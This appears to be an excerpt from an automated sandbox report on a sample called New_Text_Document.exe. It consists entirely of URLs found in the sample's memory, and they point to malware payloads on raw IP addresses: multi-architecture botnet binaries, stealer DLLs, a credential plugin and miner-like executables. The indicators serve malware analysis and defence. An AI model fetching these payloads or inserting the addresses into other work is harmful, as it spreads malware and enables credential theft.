                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.97.32.167:1320/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.153.105.100:54709/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.175.115.10/enzf/7112.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.175.115.10/enzf/7120.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.109.113.198:55401/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.118.15.13:34516/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.12.78.161:36220/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.141.78.161:47129/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.150.26.248/Mddos/Mddos.arc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.150.26.248/Mddos/Mddos.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.150.26.248/Mddos/Mddos.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.150.26.248/Mddos/Mddos.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.150.26.248/Mddos/Mddos.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.150.26.248/Mddos/Mddos.i486
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.150.26.248/Mddos/Mddos.i686
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.150.26.248/Mddos/Mddos.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.150.26.248/Mddos/Mddos.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.150.26.248/Mddos/Mddos.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.150.26.248/Mddos/Mddos.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.150.26.248/Mddos/Mddos.spc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.150.26.248/Mddos/Mddos.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.150.26.248/Mddos/Mddos.x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.150.26.248/web-api.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.161.248.78/3589a2a406ead5ea/freebl3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.161.248.78/3589a2a406ead5ea/mozglue.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.161.248.78/3589a2a406ead5ea/msvcp140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.161.248.78/3589a2a406ead5ea/nss3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.161.248.78/3589a2a406ead5ea/softokn3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.161.248.78/3589a2a406ead5ea/sqlite3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.161.248.78/3589a2a406ead5ea/vcruntime140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.69/newumma.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.19.78.190:24697/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.198.1.56:46420/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.204/Lkb2dxj3/Plugins/cred.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.204/f84Nls2/Plugins/cred.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/newpinf.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/newtpp.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/nxmr.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/pei.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/peinf.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/pinf.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tpeinf.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/newtpp.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/peinf.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/pp.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/tpeinf.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/twizt/6
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/twztl.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.216.133.16/.vi
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.216.71.153/bins/yakuza.spc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.216.71.153/bins/yakuza.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.221.3.244:13762/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/arm
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/jklarm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/jklarm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/jklarm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/jklarm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/jklm68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/jklmips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/jklmpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/jklppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/jklsh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/jklspc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/jklx86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/jklx86?ddos
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.74.161/bins/pon
